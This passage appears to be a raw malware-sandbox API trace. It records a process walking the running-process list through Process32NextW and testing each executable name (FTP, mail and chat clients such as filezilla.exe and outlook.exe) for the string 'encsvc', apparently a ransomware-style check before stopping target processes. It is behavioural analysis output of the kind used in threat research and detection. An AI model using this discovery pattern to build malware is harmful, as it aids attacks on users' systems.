WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x356d008, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0094.678] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0094.678] StrStrIA (lpFirst="opens-versions.exe", lpSrch="encsvc") returned 0x0 [0094.678] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0094.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0094.679] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356a628 [0094.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356a628, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0094.679] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0094.679] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="encsvc") returned 0x0 [0094.679] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0094.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.680] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572338 [0094.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3572338, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0094.681] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0094.681] StrStrIA (lpFirst="3dftp.exe", lpSrch="encsvc") returned 0x0 [0094.681] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0094.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.682] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356cd48 [0094.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x356cd48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0094.682] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0094.682] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="encsvc") returned 0x0 [0094.682] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0094.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.683] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35720c8 [0094.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x35720c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0094.683] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0094.683] StrStrIA (lpFirst="alftp.exe", lpSrch="encsvc") returned 0x0 [0094.683] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0094.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.684] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572290 [0094.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3572290, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0094.684] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0094.684] StrStrIA (lpFirst="barca.exe", lpSrch="encsvc") returned 0x0 [0094.684] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0094.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.685] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572218 [0094.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3572218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0094.685] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0094.685] StrStrIA (lpFirst="bitkinex.exe", lpSrch="encsvc") returned 0x0 [0094.685] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0094.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.686] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35722d8 [0094.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x35722d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0094.686] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0094.686] StrStrIA (lpFirst="coreftp.exe", lpSrch="encsvc") returned 0x0 [0094.686] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0094.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0094.687] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35478b8 [0094.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x35478b8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0094.687] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0094.687] StrStrIA (lpFirst="far.exe", lpSrch="encsvc") returned 0x0 [0094.688] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0094.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.689] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3572110 [0094.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3572110, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0094.689] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0094.689] StrStrIA (lpFirst="filezilla.exe", lpSrch="encsvc") returned 0x0 [0094.689] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0094.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.702] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572350 [0094.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3572350, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.702] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0094.702] StrStrIA (lpFirst="flashfxp.exe", lpSrch="encsvc") returned 0x0 [0094.702] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0094.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.704] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572248 [0094.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3572248, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0094.704] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0094.704] StrStrIA (lpFirst="fling.exe", lpSrch="encsvc") returned 0x0 [0094.704] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0094.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.705] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356ce68 [0094.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x356ce68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0094.705] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0094.705] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="encsvc") returned 0x0 [0094.705] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0094.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.708] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356cf48 [0094.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x356cf48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0094.708] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0094.708] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="encsvc") returned 0x0 [0094.708] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0094.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0094.709] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547938 [0094.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3547938, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0094.709] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0094.709] StrStrIA (lpFirst="icq.exe", lpSrch="encsvc") returned 0x0 [0094.709] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0094.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.710] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572260 [0094.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3572260, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.710] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0094.710] StrStrIA (lpFirst="leechftp.exe", lpSrch="encsvc") returned 0x0 [0094.710] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0094.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.712] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35721e8 [0094.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x35721e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0094.712] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0094.712] StrStrIA (lpFirst="ncftp.exe", lpSrch="encsvc") returned 0x0 [0094.712] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0094.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.713] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572230 [0094.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3572230, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0094.713] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0094.713] StrStrIA (lpFirst="notepad.exe", lpSrch="encsvc") returned 0x0 [0094.713] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0094.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.714] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3572080 [0094.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3572080, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0094.715] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0094.715] StrStrIA (lpFirst="operamail.exe", lpSrch="encsvc") returned 0x0 [0094.715] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0094.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.716] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572128 [0094.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3572128, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0094.716] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0094.716] StrStrIA (lpFirst="outlook.exe", lpSrch="encsvc") returned 0x0 [0094.716] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0094.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.718] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3572158 [0094.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3572158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0094.718] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0094.718] StrStrIA (lpFirst="pidgin.exe", lpSrch="encsvc") returned 0x0 [0094.718] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0094.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.719] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3572170 [0094.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3572170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0094.719] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0094.719] StrStrIA (lpFirst="scriptftp.exe", lpSrch="encsvc") returned 0x0 [0094.719] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0094.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.720] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572188 [0094.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3572188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0094.720] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0094.720] StrStrIA (lpFirst="skype.exe", lpSrch="encsvc") returned 0x0 [0094.720] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0094.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.722] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572320 [0094.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", 